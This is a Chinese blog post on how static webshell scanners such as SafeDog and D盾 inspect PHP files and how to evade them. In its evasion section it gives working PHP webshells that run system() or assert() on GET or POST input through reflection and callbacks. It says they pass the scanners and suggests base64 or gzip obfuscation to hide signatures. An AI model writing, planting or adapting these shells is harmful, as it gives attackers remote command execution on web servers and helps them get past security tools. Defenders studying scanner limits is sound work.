Php webshell 静态查杀总结

xx狗静态查杀大致分析

目前，传统的WAF软件主要通过定时或是由管理员手动对网站程序进行查杀的主动方式以及当请求者浏览该文件时由WAF软件被动的方式进行查杀。而查杀的原理主要是通过对目标文件的特征与网马规则库进行比对。这种查杀原理有它的局限性，攻击者可以利用脚本语言的特性对已被查杀出来的WebShell进行伪装成类似正常的页面程序从而避开WAF软件的查杀。

因为狗的查杀并没有相关资料或文档等。不过，我们仍然可以从狗的查杀中得到部分结论。

• 利用正则表达式
  这种方法最大的好处就是简单。但是，正则表达式最大的缺点就是其只对关键危险函数进行检查。也就是说，我们将关键函数稍微通过某种方式变换一下，正则表达式无法查杀了。而且，这种方法的误报率也很高。所以，这种方法的查杀效果不是很理想。但是这种方法最大的好处就是简单，速度快。一般在查杀web目录下的图片等文件时使用此种方法。

• 利用PHP代码分析技术
  这种方法最大的好处是解决了正则查杀误报率过高的问题。在这里，我们可以大致分析一下查杀引擎的工作原理：

  • 对PHP文件做预处理，去除掉注释，空格，等没有用的东西
    我们可以在php中写入以下内容

使用和d盾查杀，发现没有查杀出一句话。原来查杀引擎在查杀的时候，会做类似于编译器的优化，去掉一些乱七八糟的东西。也许你会认为代码写在注释里，php的编译器也会做类似优化操作，将其去除。而且，代码在注释里也不可能运行的。所以你可能会认为的查杀方式很正确。既简单又高效，为下一步处理降低了负担。
但是其实是不正确的。查阅php manual，在PHP 5 >= 5.1.0, PHP 7 中，php官方提供了一个函数ReflectionClass::getDocComment。简而言之，这个函数最主要的作用是获取php的注释。我们可以通过这个函数获取文档中注释，然后通过php的动态函数调用等xxxx各种方法去执行我们所获取到的代码。

• 对上一步预处理所得到的结果做词法分析
  以下代码

  $a="system(@$_get['x'])"

和

 system(@$_get['x'])

我们使用查杀引擎分别去查杀这两个文件。结果显而易见，第一个没有办法去查杀，而第二个一定会被查杀。由此，我们可以得出结论，查杀引擎会对php文件做词法分析，然后只对相关函数调用等再做进一步查杀。而类似于字符串等这样变量，查杀引擎基本上会直接将其舍弃。不再做进一步分析

• 对上一步结果进行语法分析
  从这一步开始，查杀引擎开始对相关函数的调用进行语法分析。分析变量作用域，函数参数调用等。再与webshell特征库进行比对，用以确定是否为webshell文件。

在查杀引擎中，基本上会对if等条件控制条件直接跳过，直接分析里面的代码。例如下面的例子

if (false)
  {
    system('@$_get['x']');
}

这段代码在php文件进行编译的时候，会对其进行分支优化。也就是说，这段代码因为if语句中为false，属于死码，永远不会运行，所以编译器会将其删除掉。但是换做查杀引擎，会直接查杀并报警。据我猜测，php的控制流程跳转那么多，如果查杀引擎也像编译器那样做分支结构的优化，势必会造成查杀效率的降低。所以没办法，只好不管分支结构，直接查杀。

---

躲避查杀的方法

上面大致介绍了两种查杀引擎的办法，虽然比较粗略，但是也给了我们躲避查杀的思路。那就是，想办法隐藏关键的特征码。

• 利用php反射技术
  反射是在PHP运行状态中，扩展分析PHP程序，导出或提取出关于类、方法、属性、参数等的详细信息，包括注释。这种动态获取的信息以及动态调用对象的方法的功能称为反射API。反射是操纵面向对象范型中元模型的API，其功能十分强大，可帮助我们构建复杂，可扩展的应用。其用途如：自动加载插件，自动生成文档，甚至可用来扩充PHP语言。
  也就是说，我们可以利用反射去加载system函数，通过反射去传参。因为在反射中，system这个特征码只不过是字符串，所以我们很容易对其进行加解密等操作去躲开查杀引擎的查杀。
  过狗例子

echo $func->invokeArgs(array("$_GET[c]"));?>

 这个安全狗查不到，但是d盾可以查到，而d盾查杀结果是可疑函数调用，基本上等于没查到。下面来一段d盾和都查不到的shell

class HelloWorld {

public function sayHelloTo($name) { 
    $last_line = system($name);
            return $last_line;
}

}
$a=$_GET["a"];
$reflectionMethod = new ReflectionMethod('HelloWorld', 'sayHelloTo');
echo $reflectionMethod->invoke(new HelloWorld(), $a);
?>

利用反射类中函数的办法去执行危险函数
- 利用php的callback方法
自 PHP 5.4 起可用[callable](http://php.net/manual/zh/language.types.callable.php)类型指定回调类型 callback。本文档基于同样理由使用[callback](http://php.net/manual/zh/language.pseudo-types.php#language.types.callback)类型信息。
一些函数如[call_user_func()](http://php.net/manual/zh/function.call-user-func.php)或[usort()](http://php.net/manual/zh/function.usort.php)可以接受用户自定义的回调函数作为参数。回调函数不止可以是简单函数，还可以是对象的方法，包括静态类方法。
也就是说，callback也可以接受一个字符串变量，并将其作为函数去执行。下面是例子

$a=array(@$_POST['a']);
echo array_map("assert",$a);
?>

在php中回调函数有很多，打开php的官方手册，找到支持callback的函数，基本上都可以用来做过狗一句话

-  特征码的变形隐藏
在上面的例子中，我们已经成功的将函数调用转换为字符串类型，然后通过反射等方式去执行。但是我们还需要躲避正则匹配等查杀引擎，这里还需要对特征码变形。当然了，这里变形的操作就很多了，例如base64加密，gzip压缩，或者，也可以自己写一段加解密字符串的函数。这里就不详细介绍了。
****
过狗的例子有很多，这里只不过给出思路。php作为一门弱类型的语言，可扩展性，灵活性比java一类等语言强很多。但是过于灵活也会导致很多安全问题。在静态查杀中，很容易躲避查杀，造成漏报等问题。所以在安全狗的博客中，也讲了静态查杀不太靠谱，还是防御好黑客上传shell才是正道，使其没有上传webshell的机会。

初次写文章，有些地方可能会有技术上的问题，望大牛斧正批评。也望各路大神交流过狗思路，共同学习进步。

参考资料
1.http://blog.safedog.cn/?p=77  一种理想的网站木马防护思路探究
2.http://php.net/manual/zh/language.types.callable.php phpcallback
3.https://secure.php.net/manual/zh/reflectionfunction.invoke.php php反射
4.https://security.tencent.com/index.php/blog/msg/58 TSRC挑战赛： PHP防御绕过挑战实录
5.http://wrox.cn/article/100032494/  未知攻焉知防 — Webshell变形技术集锦